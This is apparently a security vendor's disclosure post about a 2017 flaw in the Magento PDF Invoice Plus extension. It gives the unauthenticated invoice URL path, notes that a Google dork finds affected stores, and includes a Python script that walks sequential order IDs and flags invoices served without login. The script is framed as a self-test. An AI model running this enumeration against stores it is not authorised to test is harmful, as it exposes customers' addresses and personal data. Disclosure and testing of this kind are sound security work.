Magento Extension PDF Invoice Plus Vulnerability by Astra Magento Security

About PDF Invoice Plus Magento Extension Vulnerability

A couple of weeks ago, our security team was performing a security audit on a customer's Magento store. While testing the extensions installed on the store, we found a critical vulnerability in the PDF Invoice Plus extension. This extension is used by hundreds of Magento stores to generate invoices for customers, and these invoices usually contain the end customer's address and sometimes other personal information.

Consequences of the Vulnerability:

  • Loss of end user data
  • Anyone can download any other user's invoice
  • Invoice information can be located at scale via Google dorks

The Details of Vulnerability:

Mass Exploitation Possible:

We realized that, because the URL path at which PDF Invoice Plus serves invoices is the same on almost every store, it can be turned into a Google dork. We tried the following dork:

It showed all the websites using PDF Invoice Plus:

[Screenshot: Google dork results listing stores using PDF Invoice Plus]

On such stores, appending pdfinvoiceplus/order/print/order_id/508/ to the store's base URL downloads the invoice generated for order 508, without logging in and without any check that the requester owns that order. The number 508 is the order's ID; because these IDs are assigned sequentially, it can be iterated, changed, or guessed from the store's order volume to retrieve the invoices of other customers.
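The check below is an added Python example for testing your own store for this issue; it is not Astra's code and not part of the extension. It assumes the URL layout quoted above, that an unpatched store answers an unauthenticated request with the PDF itself, and that a fixed store redirects such requests to Magento's standard customer/account/login page. The store address shop.example and the canned responses in the demo are constructed, so the script runs offline; the real fetcher is only meant for stores you own or are authorised to test.

```python
"""Unauthenticated probe for the PDF Invoice Plus print endpoint.

Added example, not Astra's or the extension vendor's code. Assumptions:
  * invoices live at <store>/pdfinvoiceplus/order/print/order_id/<N>/
  * an unpatched store returns the PDF with no customer session
  * a patched store redirects anonymous requests to customer/account/login
Run the real fetcher only against stores you are authorised to test.
"""
from __future__ import annotations

import urllib.error
import urllib.request
from dataclasses import dataclass
from typing import Callable, Dict, Iterable
from urllib.parse import urljoin, urlparse

PATH_TEMPLATE = "pdfinvoiceplus/order/print/order_id/{order_id}/"


@dataclass
class Response:
    status: int
    headers: Dict[str, str]  # header names lower-cased
    body: bytes              # first bytes of the body are enough to spot a PDF


def invoice_url(store_base: str, order_id: int) -> str:
    """Build the print URL for one order id, e.g. .../order_id/508/."""
    base = store_base if store_base.endswith("/") else store_base + "/"
    return urljoin(base, PATH_TEMPLATE.format(order_id=order_id))


def classify(resp: Response) -> str:
    """Interpret what an anonymous request got back.

    'exposed' : a PDF came back, so anyone can read this customer's invoice
    'login'   : redirected to the customer login page, access control present
    'missing' : 404 or empty body, id not in use, keep iterating
    'other'   : anything else (error pages, generic HTML)
    """
    ctype = resp.headers.get("content-type", "")
    location = resp.headers.get("location", "")
    if resp.status == 200 and (resp.body.startswith(b"%PDF") or "application/pdf" in ctype):
        return "exposed"
    if resp.status in (301, 302, 303) and "customer/account/login" in location:
        return "login"
    if resp.status == 404 or (resp.status == 200 and not resp.body.strip()):
        return "missing"
    return "other"


def probe(store_base: str, order_ids: Iterable[int],
          fetch: Callable[[str], Response]) -> Dict[int, str]:
    """Request each order id without a session and map id -> verdict."""
    return {oid: classify(fetch(invoice_url(store_base, oid))) for oid in order_ids}


def http_fetch(url: str, timeout: float = 10.0) -> Response:
    """Real fetcher: no cookies and no redirect following, so a 302 stays visible."""
    class NoRedirect(urllib.request.HTTPRedirectHandler):
        def redirect_request(self, *args, **kwargs):
            return None  # makes urllib raise HTTPError(302) instead of following
    opener = urllib.request.build_opener(NoRedirect)
    req = urllib.request.Request(url, headers={"User-Agent": "invoice-idor-check"})
    try:
        with opener.open(req, timeout=timeout) as r:
            return Response(r.status, {k.lower(): v for k, v in r.headers.items()}, r.read(64))
    except urllib.error.HTTPError as e:
        return Response(e.code, {k.lower(): v for k, v in e.headers.items()}, b"")


# Constructed responses standing in for an unpatched store (no real traffic).
_FAKE_STORE = {
    507: Response(200, {"content-type": "application/pdf"}, b"%PDF-1.4 invoice 507"),
    508: Response(200, {"content-type": "application/pdf"}, b"%PDF-1.4 invoice 508"),
    509: Response(404, {"content-type": "text/html"}, b"<html>not found</html>"),
}


def fake_fetch(url: str) -> Response:
    """Offline fetcher: pull the order id out of the path and answer from the table."""
    oid = int(urlparse(url).path.rstrip("/").rsplit("/", 1)[-1])
    return _FAKE_STORE.get(oid, Response(404, {}, b""))


def demo() -> Dict[int, str]:
    """Iterate a small id window against the constructed store."""
    return probe("https://shop.example", range(507, 511), fake_fetch)


if __name__ == "__main__":
    for oid, verdict in demo().items():
        print(oid, verdict)
```

To test a real store, replace `fake_fetch` with `http_fetch` and widen the id range; any `exposed` verdict means the invoice was served to a request with no customer session, which is exactly the failure described above. After updating the extension, the same run should report `login` (or `other`) for every id.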

If you are using this extension, we highly recommend updating to the latest version to protect your store from this vulnerability.

Timeline

Vulnerability Found by Astra Team - 19/04/2017
Reported to PDF Invoice Plus Team - 19/04/2017
Worked on the Fix - 20/04/2017 to 27/04/2017
Updated Version Released - 28/04/2017

The PDF Invoice Plus team was very quick to understand the issue and started working on a fix immediately. A person from their team was assigned to the fix, and a new version was sent to us for verification shortly afterwards. Once we had verified it, the secure version of the extension was released to their customers.


About The Author

Astra Team

We are on a mission to make web a more secure place, one website at a time!

1 Comment

  1. Hi to all, it's really nice for me to pay a quick visit to this web page; it includes important information.
